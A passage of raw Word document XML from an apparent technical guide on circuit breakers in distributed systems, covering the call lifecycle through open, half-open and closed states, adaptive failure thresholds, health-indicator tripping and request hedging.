          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Bucket rotation is lock-free.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A4136" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>State transitions use AtomicReference + CAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36446C71" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1040"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Counter updates use LongAdder (high-concurrency counter with striped cells).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A00EAE3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 The Call Lifecycle Through a Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FFD61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-step execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E82FE9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43829D90" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>1. ACQUIRE PERMISSION:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E385B2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   - Read current state (atomic read).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CA2C1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594C9C94" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - Check if wait duration has elapsed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FCB21" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - If not → REJECT (throw exception or return fallback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0AA5F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - If yes → Transition to HALF-OPEN. Allow this call as a probe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2354E23E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If HALF-OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A78354D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - Check if permitted probe slots are available (atomic decrement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1771B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - If available → ALLOW.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D632020" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - If exhausted → REJECT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED432E2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If CLOSED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB0D7FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - ALLOW.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245A5D6D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="39BEDCA4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>2. EXECUTE THE CALL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A234256" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - Start timer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4D760" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - Make the actual downstream call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B75A8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - Catch any exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461A143D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - Stop timer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71873E66" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="6C71D1E1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>3. RECORD OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D8445" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - Determine outcome: success / failure / slow call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01183BB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - Record in the sliding window (atomic increment on current bucket).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B682A4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If HALF-OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE8DCC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - If success_count &gt;= threshold → Transition to CLOSED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E527D45" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - If failure_count &gt;= threshold → Transition to OPEN (reset timer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CC46D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If CLOSED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322871AD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">     - Calculate current failure rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549DB8DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     - If rate &gt; threshold → Transition to OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9C6E9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="74E09D33" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>4. RETURN RESULT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FBB572" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If successful → return response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CC36F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">   - If failed → throw exception (or return fallback).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D925E2D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="07D3FE62">
          <v:rect id="_x0000_i4251" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2333D0EC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Advanced Circuit Breaker Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E2A8DB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Adaptive Circuit Breaker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33749919" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with static thresholds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B222F1F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A 50% failure threshold works when normal error rate is ~1%. But what if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09768657" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The service normally has a 10% error rate (due to bad client requests, expected failures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230C756C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>During an outage, error rate goes to 60%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30018474" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1041"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A static 50% threshold is appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45433646" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>But another service normally has 0.1% error rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85F6FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>During an incident, error rate goes to 5%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346146C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>5% is clearly anomalous — but a 50% threshold would never trip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E4948A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1042"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>By the time it reaches 50%, the system is already deeply degraded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623229C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adaptive solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3A884" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Dynamically adjust the threshold based on baseline performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94B4BB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E64F9D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>baseline_error_rate = average error rate over the last hour (rolling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89002B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>trip_threshold = baseline_error_rate + (sensitivity_factor × standard_deviation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D84C10" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If the baseline error rate is 2% and standard deviation is 1%:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EABE81" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B39A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>trip_threshold = 2% + (3 × 1%) = 5%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF6687" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>An error rate exceeding 5% (3 standard deviations above normal) trips the circuit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0D1EFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This automatically adapts to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A9080" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Services with inherently higher error rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10364802" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Seasonal patterns (higher errors during peak hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D752F79" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1043"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Gradual degradation (detects drift from baseline).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAF804" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Circuit Breaker with Health Indicators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F9A119" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Instead of only using request success/failure, incorporate external health signals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A60848" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Backend's CPU utilization (exposed via metrics endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398A7F2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Queue depth of the downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FB712" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Database connection pool exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CF044F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1044"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Memory pressure on the downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE50B36" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBFF84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Trip if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB6502E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failure_rate &gt; 50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2EDDC2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  OR downstream_cpu &gt; 90%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE4EA5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  OR downstream_queue_depth &gt; 10000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BCA76" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  OR downstream_connection_pool_usage &gt; 95%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32E563" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Proactive circuit breaking:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Trip BEFORE failures start, based on leading indicators. The CPU spike at 90% PREDICTS failures that haven't happened yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5796DC9B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Circuit Breaker with Request Hedging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A17C0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8DFABE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When the circuit is in "half-open" or when the downstream is showing elevated latency (but circuit is still closed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D90445" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Send the request to the primary downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34859C37" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Simultaneously start a timer (e.g., p95 latency threshold).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C6B8F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the primary doesn't respond within the timer → send a "hedge" request to a secondary/alternative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B253B6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Return whichever responds first. Cancel the other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12425C9D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E7B14E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Reduced tail latency (the hedge catches slow primary responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189AEA3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breaker data (if the primary consistently loses to the hedge, it's evidence of degradation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD90FD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1046"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No additional latency for fast responses (hedge only fires after the timer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAFF15B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
